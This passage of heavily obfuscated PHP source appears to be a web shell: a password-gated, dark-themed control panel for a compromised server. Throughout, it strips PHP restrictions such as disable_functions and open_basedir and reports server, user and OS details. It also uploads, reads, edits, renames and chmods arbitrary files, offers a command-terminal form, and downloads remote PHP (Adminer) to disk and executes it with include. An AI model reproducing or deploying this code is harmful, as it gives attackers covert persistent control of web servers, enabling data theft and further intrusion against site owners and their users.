isset($_GET["\147\145\x74\x64\151\x72"]) ? $_GET["\147\x65\x74\x64\x69\162"] : ''; $desfil = $upfiltodir . "\x2f" . $upfile["\156\x61\155\145"]; if (upFil($upfile, $desfil)) { displayAlert("\123\165\143\x63\145\x73\163\x20\x55\160\x6c\x6f\x61\144\40\111\x6e" . $desfil, "\163\165\143\x63\145\x73\163"); } else { displayAlert("\106\141\x69\x6c\145\x64\40\x55\160\x6c\157\x61\144\x20\x49\156\40" . $desfil, "\144\141\156\147\145\162"); } } } goto Mrb2A; EGi9S: echo "{$_SERVER["\123\105\x52\x56\x45\x52\x5f\123\117\x46\x54\x57\101\122\x45"]}"; goto EOEix; fgSyv: echo getcwd(); goto uGapP; N5d1G: ?>
<a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="searching"data-bs-toggle2="tooltip"href="<?php  goto flT2x; RJZ6S: ini_restore("\163\x61\x66\x65\137\x6d\157\x64\145"); goto SexdO; wBzEb: function getUserGroupInfo() { $username = get_current_user(); if (function_exists("\160\157\x73\x69\170\137\147\145\164\x75\151\144") && function_exists("\x70\x6f\x73\x69\x78\x5f\147\145\164\147\x69\144")) { $uid = posix_getuid(); $gid = posix_getgid(); $groupinfo = posix_getgrgid($gid); $groupname = $groupinfo["\x6e\141\x6d\145"]; } else { $uid = getmyuid(); $gid = getmygid(); $groupname = "\x3f"; } return "\74\163\x70\x61\x6e\40\x63\x6c\141\x73\163\75\x27\164\x65\x78\x74\x2d\163\165\x63\143\145\163\163\x27\x3e{$username}\40\50{$uid}\x29\40\57\x20{$groupname}\74\x2f\x73\160\x61\x6e\x3e"; } goto SwLyI; yQvhJ: $disabledFunc = getDisabledFunctions(); goto KdUFm; ib1xY: @ini_set("\155\141\170\x5f\x65\170\x65\x63\x75\164\x69\x6f\156\x5f\x74\x69\155\x65", 0); goto rHz1f; uGapP: ?>
"><i class="fad fa-house"></i></a> <a class="btn btn-outline-light me-2 font-weight-bold"data-bs-placement="top"data-bs-title="Refresh"data-bs-toggle2="tooltip"href="#"onclick="location.replace(location.href)"><i class="fad fa-rotate"></i> </a><?php  goto IU1Xg; jyDMo: $defcmd = "\x3e\40" . termnotasi(); goto gKZcJ; XL0iB: echo function_exists("\x70\x79\x74\150\157\156") ? "\x3c\x73\x70\x61\x6e\40\x63\154\x61\x73\x73\x3d\42\164\x65\170\x74\55\x73\165\143\x63\145\163\x73\x22\76\117\116\74\x2f\x73\160\x61\156\x3e" : "\x3c\163\x70\141\156\x20\143\x6c\141\x73\x73\x3d\42\x74\x65\x78\164\55\144\141\x6e\x67\145\x72\42\x3e\117\x46\106\74\57\x73\160\141\x6e\76"; goto Jtcyo; i0xkR: ?>
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Server IP:</span> <span class="text-success"><?php  goto kBm3K; Wy3xc: function displayAlert($msg, $type) { echo "\x3c\144\151\166\40\143\154\141\x73\163\x3d\42\141\154\145\x72\x74\x20\141\x6c\145\x72\164\55" . $type . "\40\x61\x6c\x65\x72\164\x2d\x64\x69\163\155\x69\x73\163\151\142\154\x65\x20\x66\141\x64\145\x20\x73\x68\x6f\x77\40\x62\157\x72\144\x65\x72\x2d\154\x69\147\x68\164\42\40\162\157\x6c\145\75\x22\141\154\x65\162\164\42\76\xa\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\x20\40" . $msg . "\12\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x3c\142\165\164\164\x6f\156\40\x74\x79\160\145\75\42\x62\x75\164\x74\x6f\156\x22\40\x63\x6c\x61\163\x73\75\x22\x62\x74\156\x2d\143\x6c\x6f\x73\x65\42\40\144\141\x74\x61\x2d\142\x73\55\144\x69\x73\x6d\x69\163\163\75\x22\x61\x6c\x65\162\164\42\40\x61\x72\x69\x61\x2d\x6c\141\x62\145\x6c\75\42\x43\x6c\x6f\x73\x65\x22\76\74\x2f\142\165\x74\x74\157\x6e\76\12\40\x20\x20\x20\x20\40\40\x20\x20\x20\x3c\x2f\x64\151\x76\76"; } goto MKNta; Jtcyo: ?>
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> OS:</span><?php  goto lh6vq; rHz1f: @ini_set("\x6f\x75\164\160\x75\164\137\x62\x75\x66\x66\x65\162\x69\x6e\x67", 0); goto qanfw; Ztzcw: function getDisabledFunctions() { $d = ini_get("\144\x69\163\141\142\x6c\x65\137\146\x75\x6e\143\x74\151\157\x6e\163"); $arr = array(); if ($d) { foreach (explode("\x2c", $d) as $func) { $arr[] = $func; } } return $arr; } goto Wy3xc; RJWH8: $cekfopenon = ini_get("\x61\x6c\154\157\167\x5f\x75\x72\x6c\137\x66\157\x70\x65\156"); goto H6Tp2; lEKGy: if (isset($_POST["\143\x68\x61\x6e\x67\145\137\x70\x65\162\x6d\x69\x73\163\151\x6f\x6e"])) { $permission = intval($_POST["\x70\145\162\x6d\x69\x73\x73\x69\x6f\156"], 8); if (chmod($getfile, $permission)) { displayAlert("\103\150\x61\x6e\x67\x65\40\120\145\162\x6d\151\x73\163\151\x6f\x6e\40\117\x4b\x21", "\x73\x75\x63\x63\x65\x73\x73"); } else { displayAlert("\103\x68\x61\156\147\145\40\120\x65\x72\x6d\x69\163\x73\151\x6f\156\x20\106\101\111\x4c\105\104\x21", "\144\x61\156\x67\x65\x72"); } } goto JGZ79; j84KU: @set_time_limit(0); goto ib1xY; pHDy4: function cekPerm($f) { if (IS_WIN) { $perms = @fileperms($f) & 4095; } else { $perms = @fileperms($f); } $mode = ''; $mode .= $perms & 256 ? "\162" : "\x2d"; $mode .= $perms & 128 ? "\167" : "\x2d"; $mode .= $perms & 64 ? $perms & 2048 ? "\163" : "\170" : ($perms & 2048 ? "\123" : "\x2d"); $mode .= $perms & 32 ? "\162" : "\x2d"; $mode .= $perms & 16 ? "\x77" : "\x2d"; $mode .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $mode .= $perms & 4 ? "\162" : "\55"; $mode .= $perms & 2 ? "\x77" : "\55"; $mode .= $perms & 1 ? $perms & 512 ? "\164" : "\170" : ($perms & 512 ? "\124" : "\55"); $permis = substr(sprintf("\45\x6f", $perms), -3); $res = "\50" . $permis . "\51\x20" . $mode; return $res; } goto u7qY1; Hs_m8: define("\x49\123\x5f\127\111\116", strtoupper(substr(PHP_OS, 0, 3)) === "\x57\x49\x4e"); goto LfI7x; Fxsb6: $getfile = isset($_GET["\147\145\x74\x66\151\x6c\x65"]) && !empty($_GET["\x67\x65\164\x66\151\154\x65"]) ? IS_WIN ? str_replace("\x5c", "\x2f", $_GET["\147\x65\x74\146\151\154\x65"]) : $_GET["\x67\145\x74\x66\x69\154\x65"] : null; goto Ztzcw; AfZc1: $modalCmd = "\74\146\x6f\x72\x6d\x20\151\x64\x3d\x22\146\157\x72\x6d\143\x6d\144\42\x20\x6d\x65\x74\150\157\144\75\x22\x50\117\123\124\x22\x3e\xa\x20\x20\x20\40\x20\x20\x3c\144\151\166\40\143\x6c\x61\163\163\75\42\155\142\55\x33\42\76\xa\x20\40\x20\40\x20\x20\x20\40\74\144\151\x76\40\143\x6c\x61\x73\163\x3d\42\x77\x2d\x31\x30\x30\42\76\12\x20\40\40\x20\x20\x20\40\x20\x20\x20\x3c\x74\x65\x78\x74\141\x72\145\x61\40\143\154\x61\163\163\x3d\42\146\x6f\162\155\55\x63\x6f\x6e\x74\162\157\x6c\x20\142\147\x2d\142\154\141\x63\x6b\x20\164\145\170\x74\55\x73\x75\143\x63\x65\163\163\40\x66\x6f\x6e\164\x2d\x6d\x6f\x6e\157\x73\x70\141\143\145\x22\40\151\144\x3d\x22\x72\x65\163\143\155\144\x22\x20\156\x61\155\x65\x3d\42\x72\x65\163\x63\155\x64\x22\40\x72\x6f\x77\x73\75\x22\62\65\x22\x20\x72\145\141\x64\x6f\156\x6c\171\x3e\74\x2f\x74\x65\x78\164\x61\x72\145\x61\x3e\12\40\x20\x20\x20\40\40\40\40\74\57\144\151\x76\x3e\xa\40\40\x20\x20\40\x20\x3c\57\x64\x69\166\76\xa\40\x20\40\40\x20\x20\74\x64\x69\x76\x20\x63\154\x61\163\163\75\42\155\142\x2d\x33\40\x64\55\146\154\145\170\42\76\12\x20\40\x20\x20\40\x20\40\40\x3c\x69\156\x70\165\x74\40\164\x79\160\145\x3d\x22\x74\145\x78\x74\42\x20\x63\154\141\x73\x73\75\x22\x66\157\162\x6d\x2d\143\157\x6e\x74\162\x6f\154\40\x62\147\x2d\142\x6c\141\x63\153\40\x74\x65\170\x74\x2d\163\165\143\143\145\x73\163\x20\x66\x6f\x6e\164\55\155\x6f\x6e\x6f\163\x70\x61\x63\145\42\x20\151\x64\x3d\42\x63\157\x6d\155\x61\x6e\x64\x22\40\x6e\x61\x6d\x65\75\42\143\x6f\155\x6d\141\156\x64\x22\40\160\x6c\141\x63\145\x68\157\x6c\144\145\x72\x3d\x22" . $vartn . "\42\76\12\x20\40\x20\40\x20\x20\x20\x20\x3c\x62\165\164\164\157\x6e\40\x74\171\160\145\x3d\42\x73\165\x62\155\x69\x74\x22\x20\x63\154\141\x73\x73\x3d\42\142\164\156\x20\142\147\55\142\154\x61\x63\x6b\x20\x74\x65\170\164\x2d\154\x69\x67\150\164\x20\146\154\157\141\164\x2d\x65\156\144\x20\x6d\163\x2d\x32\x22\76\12\40\x20\40\x20\x20\40\x20\40\x20\40\x3c\x73\160\141\x6e\x20\x63\154\141\163\x73\75\42\163\x70\151\156\x6e\x65\x72\x2d\x62\157\162\x64\145\162\40\x73\160\151\x6e\156\x65\x72\x2d\x62\x6f\x72\x64\145\x72\55\x73\x6d\40\x64\55\x6e\x6f\156\145\42\x20\162\157\154\145\75\42\163\164\141\x74\165\x73\x22\x20\141\x72\x69\141\x2d\x68\x69\x64\x64\x65\156\x3d\x22\x74\162\165\145\x22\76\74\x2f\163\x70\141\156\x3e\12\x20\x20\40\40\40\x20\x20\x20\x20\40\x3c\163\x70\141\156\40\143\154\x61\x73\163\x3d\x22\166\x69\163\x75\x61\154\154\171\55\150\x69\x64\x64\145\156\42\x3e\114\x6f\141\x64\x69\156\147\x2e\56\x2e\x3c\x2f\x73\160\x61\156\x3e\12\40\x20\40\x20\x20\x20\40\x20\x20\x20\x3c\151\40\x63\154\141\163\163\75\42\146\x61\x64\x20\146\x61\x2d\x73\x65\156\x64\x22\x3e\74\57\x69\x3e\12\40\40\40\x20\x20\x20\40\x20\74\57\x62\165\x74\x74\157\x6e\x3e\12\x20\x20\40\x20\x20\x20\x3c\57\144\151\166\x3e\xa\x20\40\x20\40\x3c\57\x66\157\162\x6d\x3e"; goto pHDy4; xFpoT: ?>
<div class="row mb-2"><div class="col-12"><div class="border-light card"><div class="d-flex card-body"style="overflow:auto"><span class="text-warning flex-grow-1 mb-0 text-decoration-none"><i class="fa-duotone fa-folder-open"style="--fa-secondary-opacity:0.7"></i><?php  goto S9YqN; W6n8o: ?>
<!doctypehtml><html data-bs-theme="dark"lang="id"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="noindex, nofollow"name="robots"><meta content="no-cache, must-revalidate, post-check=0, pre-check=0"http-equiv="cache-control"><meta content="0"http-equiv="expires"><meta content="no-cache"http-equiv="pragma"><title><?php  goto Od1fM; ZHQre: function twomenu($g) { $d = $_SERVER["\104\117\x43\125\x4d\105\x4e\124\137\122\117\x4f\x54"]; $c = count(explode("\x2f", $d)) - 1; $p = trim(dirname(str_replace("\77\147\145\164\x66\151\x6c\145\x3d", '', $g)), "\x2f"); $f = basename($g); $r = array_slice(explode("\x2f", $p), $c); $u = $_SERVER["\110\x54\x54\x50\x5f\x48\117\123\124"] . "\x2f" . implode("\57", $r) . "\57" . $f; $h = "\74\x64\151\166\40\x63\154\141\x73\x73\x3d\42\142\x74\156\x2d\x67\x72\x6f\x75\160\x22\x20\x73\164\171\154\145\75\x22\x6c\x65\x74\164\x65\162\55\163\160\x61\143\151\x6e\147\72\40\x33\x70\170\x3b\42\x3e\x3c\x62\165\164\x74\157\x6e\40\164\x79\x70\x65\75\42\142\x75\164\164\x6f\x6e\x22\x20\143\x6c\x61\x73\163\x3d\42\142\164\x6e\40\142\164\x6e\55\x64\141\x72\x6b\x22\x20\x64\141\164\141\55\x62\163\55\x74\x6f\x67\x67\x6c\x65\75\x22\x64\x72\157\160\144\x6f\167\x6e\42\x20\141\162\151\141\x2d\x65\x78\160\x61\156\144\145\144\75\42\x66\x61\154\163\145\42\76\x3c\151\x20\x63\x6c\141\x73\x73\75\42\x66\141\x64\x20\146\x61\x2d\147\145\141\x72\42\76\x3c\x2f\x69\76\74\x2f\x62\165\x74\x74\x6f\x6e\76\x3c\165\x6c\40\x63\154\141\x73\x73\75\x22\x64\162\157\160\144\157\x77\x6e\55\x6d\x65\156\x75\x22\x3e"; $h .= "\x3c\154\151\x3e\74\141\x20\x73\x74\171\154\145\75\x22\x66\x6f\x6e\x74\55\x73\151\x7a\x65\72\x20\61\63\160\x78\73\x22\40\x63\x6c\141\x73\x73\75\x22\144\x72\x6f\160\144\x6f\x77\156\55\x69\164\x65\x6d\x20\x74\x65\x78\x74\x2d\154\151\147\x68\x74\42\40\150\162\x65\146\x3d\x22" . $g . "\x22\x3e\x3c\x69\40\143\154\x61\163\163\x3d\42\x66\x61\x64\40\146\141\x2d\160\145\x6e\55\x74\x6f\55\163\x71\165\141\x72\x65\x22\76\74\x2f\x69\76\40\x45\104\111\124\74\57\x61\76\x3c\57\x6c\x69\76"; $h .= "\x3c\x6c\151\x3e\x3c\141\40\x73\x74\171\154\x65\x3d\x22\x66\x6f\x6e\x74\55\x73\x69\x7a\x65\72\x20\61\63\160\x78\x3b\42\40\143\154\141\163\x73\75\42\144\162\157\160\x64\157\x77\x6e\x2d\151\x74\145\155\40\x74\x65\170\x74\x2d\x6c\x69\147\150\x74\42\40\150\162\145\146\75\42\150\x74\164\x70\x73\72\57\57" . trim($u) . "\x22\40\164\141\162\x67\145\164\75\x22\137\142\154\x61\x6e\x6b\x22\76\x3c\x69\x20\143\x6c\141\163\163\75\42\x66\x61\x64\x20\x66\141\55\x67\154\x6f\x62\145\x22\x3e\74\x2f\151\x3e\40\x56\111\105\127\x3c\x2f\x61\x3e\74\x2f\x6c\x69\76"; $h .= "\74\57\x75\154\x3e\74\57\x64\x69\x76\x3e"; return $h; } goto wBzEb; SexdO: ini_restore("\157\160\145\156\x5f\x62\x61\163\x65\x64\x69\162"); goto RJWH8; AkcPy: echo phpversion(); goto GVhMk; tWlkv: ?>
</span></div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-person"></i> User (ID) / Group:</span><?php  goto Zxvrr; wFaVC: if (isset($_GET["\x6c\x6f\x67\x69\156\x6c\145\151"])) { $submitted_pass = isset($_GET["\x70\x77\144\154\x65\x69"]) ? $_GET["\x70\x77\144\154\145\x69"] : ''; if (md5($submitted_pass) == $auth_pass) { $_SESSION["\155\x61\163\165\x6b"] = $auth_pass; } else { echo "\74\163\143\162\x69\160\x74\x3e\141\154\x65\x72\x74\x28\x27\x50\141\163\167\x64\x20\123\141\x6c\141\150\41\40\x4b\155\x20\x4d\x77\x20\116\x69\x6b\165\156\147\x20\x59\x68\x3f\40\x3a\x76\47\51\73\x3c\57\163\x63\x72\x69\160\164\x3e"; login_ralei(); } } goto SlGUD; NLzar: ?>
<?php  goto qdLwq; kocnX: echo !empty($disabledFunc) ? "\x64\141\156\x67\x65\x72" : "\x73\165\x63\143\145\163\x73"; goto KmulI; gDQyA: if (isset($_GET["\145\x78"]) && $_GET["\x65\170"] == "\141\x64\155\x69\156\145\x72") { function gadminer($cek) { $lei = leijson()["\x6c\145\x69"]; $php_url = $lei[0]; $css_url = $lei[1]; $php = $cek ? file_get_contents($php_url) : curl_req($php_url); $css = $cek ? file_get_contents($css_url) : curl_req($css_url); $a = "\141\144\x6d\x69\156\x65\x72\x2e\160\150\x70"; $b = "\x61\144\155\x69\x6e\145\162\56\x63\163\x73"; if (!file_exists($a) || filesize($a) == 0) { if (file_exists($a)) { unlink($a); unlink($b); } if (!file_put_contents($b, $css) || !file_put_contents($a, $php)) { die("\x46\x61\x69\x6c\145\x64\40\x74\157\40\x63\162\145\x61\x74\145\x20\x61\x64\x6d\151\x6e\x65\162"); } } include $a; } gadminer($cekfopenon); } goto ZHQre; OvkMa: $modalCfile = "\74\146\157\162\x6d\40\155\x65\164\x68\x6f\144\x3d\42\x70\157\163\164\42\x3e" . "\74\144\151\x76\40\143\154\141\163\x73\x3d\42\155\142\x2d\64\42\76" . "\74\154\x61\x62\145\154\40\146\x6f\x72\x3d\x22\x66\151\154\x65\156\141\155\x65\x2d\151\x6e\x70\x75\164\x22\40\x63\154\x61\x73\163\x3d\x22\x66\x6f\x72\155\x2d\x6c\141\142\145\154\42\x3e\x46\x69\154\x65\x20\116\141\155\145\74\57\x6c\141\142\145\x6c\76" . "\74\x69\156\x70\x75\164\40\164\171\160\145\x3d\x22\164\145\x78\x74\42\40\x63\x6c\x61\x73\163\75\42\146\157\162\155\x2d\x63\x6f\156\164\x72\x6f\x6c\x22\40\x6e\141\x6d\x65\x3d\42\x66\151\x6c\x65\137\156\x61\x6d\x65\42\x20\151\144\75\x22\x66\151\154\x65\156\141\155\x65\x2d\x69\x6e\160\x75\x74\42\40\x72\x65\161\165\151\x72\x65\144\40\x70\154\141\143\145\150\157\154\144\x65\162\75\42\x45\x6e\164\x65\162\x20\146\x69\x6c\x65\40\156\141\155\x65\42\76" . "\x3c\57\x64\x69\x76\x3e" . "\x3c\144\x69\x76\x20\x63\154\x61\163\x73\x3d\x22\150\163\164\141\143\153\x20\x67\x61\160\55\x32\x20\152\x75\163\x74\151\146\171\55\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x65\156\x64\42\x3e" . "\74\x62\x75\164\x74\157\x6e\x20\x74\171\160\x65\75\x22\x62\x75\164\164\157\x6e\42\40\x63\x6c\141\163\163\x3d\x22\142\164\156\x20\142\x74\x6e\55\157\x75\164\154\x69\x6e\x65\x2d\144\x61\x6e\x67\x65\x72\42\40\144\141\x74\x61\55\x62\x73\55\x64\x69\163\155\151\x73\163\x3d\x22\155\x6f\x64\x61\154\x22\76\103\x6c\157\x73\x65\74\57\142\x75\164\164\x6f\x6e\76" . "\74\142\x75\164\x74\157\156\x20\164\x79\x70\x65\x3d\x22\x73\165\142\155\151\164\x22\x20\x63\x6c\x61\x73\163\x3d\42\x62\x74\x6e\x20\x62\x74\156\x2d\160\162\151\x6d\x61\162\x79\x22\40\x6e\141\x6d\145\x3d\x22\x63\162\145\141\164\145\x5f\x66\151\154\x65\42\x20\x69\144\75\x22\141\144\x64\x4e\x65\x77\106\151\x6c\x65\x22\76\x43\x72\x65\x61\164\145\74\57\x62\x75\164\164\x6f\x6e\x3e" . "\x3c\57\144\x69\166\x3e" . "\74\x2f\146\157\162\x6d\76"; goto C0BHX; M2vPM: if (isset($getfile)) { if (file_exists($getfile)) { function to_dir() { global $getdir; $url = $_SERVER["\x52\105\x51\125\105\123\124\137\x55\122\x49"]; $to = preg_replace("\57\x28\134\x3f\x7c\x26\x29\x67\145\x74\146\151\x6c\x65\x3d\x2f", "\x24\x31\x67\x65\164\x64\x69\x72\75", $url); $go = dirname($to); echo "\74\163\143\162\x69\x70\164\x3e\40\163\145\164\124\151\155\x65\x6f\165\x74\x28\x66\x75\x6e\143\x74\x69\x6f\156\50\x29\x20\173\x77\x69\156\144\x6f\x77\56\x6c\157\x63\x61\164\151\x6f\x6e\40\x3d\x20\47{$go}\47\73\x20\x7d\54\x20\x31\x30\60\x30\51\73\74\x2f\x73\x63\162\151\160\164\76"; } function read_file($filename) { $lines = file($filename); return implode('', $lines); } if ($cekfopenon) { $file_contents = is_file($getfile) ? file_get_contents($getfile) : ''; } else { $file_contents = is_file($getfile) ? read_file($getfile) : ''; } echo "\xa\40\40\40\40\74\144\151\166\40\x63\x6c\141\163\163\x3d\x22\x72\x6f\x77\40\155\142\55\x32\x22\x3e\xa\x20\40\40\40\x3c\x64\x69\x76\40\x63\x6c\x61\163\163\75\42\x63\x6f\154\55\x36\42\76\12\x20\40\40\x20\74\144\x69\166\x20\x63\x6c\x61\163\x73\75\x22\x63\141\x72\x64\40\142\157\162\144\x65\162\40\142\157\x72\x64\x65\162\x2d\x6c\x69\147\150\164\42\x3e\xa\x20\x20\40\x20\x3c\x64\151\x76\40\143\x6c\x61\x73\x73\75\x22\143\141\162\x64\55\x62\x6f\144\x79\x22\76\xa\40\40\40\40\x3c\146\x6f\x72\155\x20\155\x65\x74\x68\157\144\x3d\42\x70\157\x73\x74\x22\76\12\x20\x20\40\40\74\x64\x69\166\x20\x63\154\x61\163\163\75\42\x66\x6f\x72\x6d\x2d\147\x72\157\165\x70\x22\76\12\40\x20\x20\x20\40\x20\x20\x20\x3c\x6c\x61\x62\x65\154\40\x63\x6c\x61\163\x73\x3d\x22\164\145\x78\x74\55\x6c\151\147\x68\x74\x22\x3e\x4e\x61\155\x65\72\74\57\x6c\141\142\x65\154\76\xa\x20\40\x20\x20\40\x20\40\x20\74\151\x6e\160\x75\164\x20\x74\171\x70\x65\75\x22\x74\145\x78\x74\42\x20\143\x6c\141\163\x73\x3d\42\146\157\x72\x6d\55\x63\x6f\156\164\162\157\x6c\42\40\151\x64\75\x22\156\141\x6d\x61\146\x69\x6c\145\x22\x20\156\x61\x6d\x65\75\42\x6e\145\x77\x5f\x6e\x61\155\x65\x22\x20\x76\141\154\165\x65\75\x22" . basename($getfile) . "\42\x3e\xa\40\x20\40\40\74\57\144\151\166\76\xa\40\40\x20\40\x3c\x64\x69\166\x20\x63\154\141\163\x73\75\x22\x70\x79\x2d\x32\42\x3e\12\x20\x20\x20\40\x3c\151\x6e\x70\x75\x74\40\x74\x79\160\x65\x3d\42\x73\165\142\155\151\x74\x22\x20\143\154\x61\163\163\75\42\142\164\x6e\x20\x62\164\156\x2d\x73\x6d\40\142\164\156\55\157\x75\164\154\x69\156\x65\x2d\x6c\151\147\x68\164\x22\x20\x73\164\171\154\x65\75\x22\167\151\144\164\150\x3a\61\60\x30\x25\x3b\42\x20\40\x6e\x61\155\x65\x3d\42\x72\145\156\x61\155\x65\42\40\166\x61\x6c\165\145\x3d\42\122\x65\x6e\141\x6d\145\x22\x3e\12\x20\x20\x20\40\x3c\x2f\144\x69\x76\x3e\12\40\x20\40\40\74\57\x66\x6f\162\x6d\x3e\12\x20\40\40\x20\x3c\57\x64\x69\166\76\12\x20\40\x20\x20\74\57\144\151\x76\76\12\x20\40\x20\40\74\x2f\144\151\166\x3e\xa\x20\x20\40\40"; echo "\x3c\x64\151\x76\x20\x63\154\x61\x73\x73\75\x22\x63\x6f\154\x2d\x36\x22\76\12\40\40\x3c\x64\151\166\x20\x63\154\141\x73\163\75\42\x63\141\162\x64\40\142\x6f\162\x64\145\x72\x20\142\x6f\x72\x64\x65\x72\x2d\154\x69\147\150\164\42\x3e\xa\40\x20\x3c\144\x69\x76\x20\x63\x6c\x61\x73\x73\75\42\x63\x61\x72\144\55\x62\157\x64\171\x22\x3e\12\x20\x20\74\146\x6f\162\155\x20\x6d\x65\164\150\x6f\x64\75\x22\160\x6f\163\x74\42\76\12\40\x20\74\x64\x69\x76\x20\x63\154\141\x73\163\x3d\x22\x66\x6f\x72\155\55\147\x72\x6f\x75\x70\x22\x3e\12\40\40\40\x20\74\154\x61\142\x65\x6c\40\143\154\141\163\163\x3d\42\x74\145\x78\x74\55\154\x69\x67\x68\x74\42\76\x50\x65\162\155\x69\x73\x73\x69\157\156\x3c\x2f\154\x61\x62\145\154\x3e\xa\40\40\40\40\74\151\x6e\160\x75\x74\x20\164\x79\x70\x65\75\x22\164\x65\x78\164\x22\x20\x63\154\x61\163\x73\75\x22\146\x6f\162\x6d\55\143\157\x6e\x74\x72\157\154\x22\40\156\x61\155\145\75\42\x70\x65\x72\x6d\151\163\163\151\x6f\156\x22\x20\x76\x61\154\x75\x65\x3d\x22" . @substr(sprintf("\x25\x6f", fileperms($getfile)), -4) . "\42\76\12\40\40\74\x2f\144\151\x76\76\12\40\40\74\144\151\166\x20\143\x6c\x61\163\x73\75\42\160\x79\x2d\62\x22\x3e\12\40\40\74\151\156\160\165\x74\x20\x74\171\x70\x65\75\x22\163\165\142\155\151\164\x22\x20\x63\154\141\163\x73\75\42\x62\164\x6e\40\142\164\156\55\x73\155\x20\142\x74\156\x2d\x6f\165\x74\154\x69\156\x65\55\x6c\151\x67\x68\164\x22\x20\163\x74\x79\x6c\145\x3d\42\167\151\144\164\x68\x3a\x31\60\x30\x25\x3b\42\40\x6e\x61\155\145\x3d\x22\x63\x68\x61\156\x67\145\x5f\x70\x65\162\x6d\x69\163\x73\151\x6f\156\x22\40\166\x61\x6c\165\x65\x3d\42\x43\150\x61\156\147\145\42\76\12\x20\40\x3c\57\x64\151\166\x3e\12\40\40\74\57\146\x6f\x72\x6d\x3e\12\x20\40\x3c\x2f\144\x69\x76\x3e\12\40\x20\x3c\57\x64\x69\x76\x3e\12\x20\40\74\57\144\x69\x76\76\12\40\74\x2f\x64\151\x76\x3e\12\40"; echo "\12\40\40\40\x20\74\x64\x69\166\40\143\x6c\141\163\163\75\x22\x72\157\x77\40\155\x62\x2d\x32\42\76\12\40\x20\40\x20\x3c\144\151\x76\x20\143\154\141\x73\163\75\42\x63\157\x6c\55\x31\x32\42\x3e\12\x20\40\x20\40\74\x64\151\x76\x20\x63\x6c\141\x73\x73\x3d\42\x63\x61\162\x64\x20\142\157\x72\x64\x65\162\40\142\157\x72\x64\x65\162\x2d\154\151\147\x68\164\42\76\xa\40\40\x20\40\74\144\x69\166\x20\x63\154\141\163\163\x3d\42\x63\141\x72\144\55\142\157\144\171\x22\x3e\x20\40\x20\40\xa\40\40\40\40\74\146\157\162\x6d\x20\155\145\x74\150\157\144\75\x22\160\157\x73\164\x22\x3e\xa\x20\40\x20\x20\74\144\151\166\40\143\x6c\x61\163\x73\75\x22\x6d\142\x2d\x33\x22\x3e\12\x20\x20\x20\x20\x3c\x70\x20\143\154\x61\x73\163\75\x22\x74\x65\x78\164\x2d\x6c\x69\x67\150\x74\40\164\x65\x78\164\55\164\162\165\156\143\x61\x74\145\x20\164\145\x78\164\x2d\143\145\156\x74\145\162\40\155\142\x2d\x33\x22\76\43\x20" . basename($getfile) . "\x3c\x2f\160\x3e\xa\x20\40\x20\x20\74\164\145\170\164\x61\x72\145\141\x20\143\x6c\x61\x73\x73\75\x22\146\157\x72\155\55\x63\157\x6e\164\x72\x6f\154\42\40\x69\144\75\42\164\x65\x78\164\141\x72\145\141\x22\x20\156\141\x6d\x65\x3d\42\x69\x73\x69\146\x69\154\145\42\x20\162\157\167\163\75\x22\x31\x30\42\x3e" . htmlentities($file_contents) . "\x3c\x2f\164\x65\x78\164\x61\162\x65\141\x3e\x20\x20\x20\x20\x20\x20\x20\12\40\x20\x20\x20\74\x2f\144\x69\x76\76\12\40\40\40\40\x3c\x64\x69\166\40\x63\154\141\163\163\x3d\x22\x64\x2d\x66\x6c\145\x78\40\x64\x2d\147\162\x69\144\x20\147\x61\160\x2d\62\x20\x6a\165\x73\x74\x69\x66\171\55\143\157\156\164\x65\x6e\x74\x2d\x63\x65\156\x74\x65\162\x22\x3e\xa\40\x20\40\x20\74\x69\156\x70\x75\x74\x20\164\x79\x70\145\x3d\x22\163\x75\142\155\x69\164\42\x20\x63\154\141\x73\x73\x3d\x22\142\x74\x6e\x20\x62\164\156\55\157\x75\164\x6c\x69\x6e\145\x2d\x6c\151\147\x68\164\x22\x20\156\x61\x6d\x65\75\42\163\141\x76\x65\x5f\146\x69\154\x65\42\x20\x76\x61\154\165\x65\x3d\x22\x55\160\x64\141\164\145\x22\76\xa\x20\40\40\x20\74\151\156\160\x75\x74\40\x74\171\x70\x65\x3d\42\x62\x75\164\164\x6f\x6e\x22\40\x63\154\141\163\163\75\42\142\164\156\x20\x62\x74\x6e\x2d\157\x75\x74\x6c\x69\x6e\x65\x2d\154\151\147\x68\x74\x22\40\157\156\143\x6c\x69\143\x6b\75\42\163\141\x76\145\x66\162\157\155\x28\47\164\x65\x78\x74\141\x72\145\141\x27\x29\42\40\166\141\154\x75\145\x3d\x22\x44\x6f\x77\156\x6c\x6f\x61\144\x22\76\40\x20\40\40\xa\40\40\40\40\x3c\57\x64\x69\166\x3e\xa\40\x20\x20\x20\x3c\x2f\146\157\162\155\76\12\x20\40\x20\x20\74\x2f\x64\151\x76\x3e\xa\x20\x20\40\x20\x3c\57\144\151\x76\x3e\xa\40\x20\40\40\74\x2f\144\x69\166\x3e\xa\40\40\40\x20\74\x2f\x64\151\x76\x3e\12\40\40\40\40"; } else { displayAlert("{$getfile}\40\72\x20\x4e\x6f\x74\x20\141\x20\166\x61\x6c\x69\144\x20\x66\151\154\145\x20\160\x61\x74\x68\41", "\x64\x61\156\147\145\162"); } } goto pdgfd; mwAc1: echo !empty($disabledFunc) ? implode("\x2c\40", $disabledFunc) : "\116\157\x6e\x65"; goto VRGnu; kBm3K: echo "{$_SERVER["\x53\105\x52\x56\105\122\x5f\x41\104\x44\x52"]}"; goto R8Gse; qanfw: ini_restore("\144\151\163\x61\142\154\145\x5f\146\165\156\143\x74\151\157\156\x73"); goto xN1dV; eD2Ck: ?>
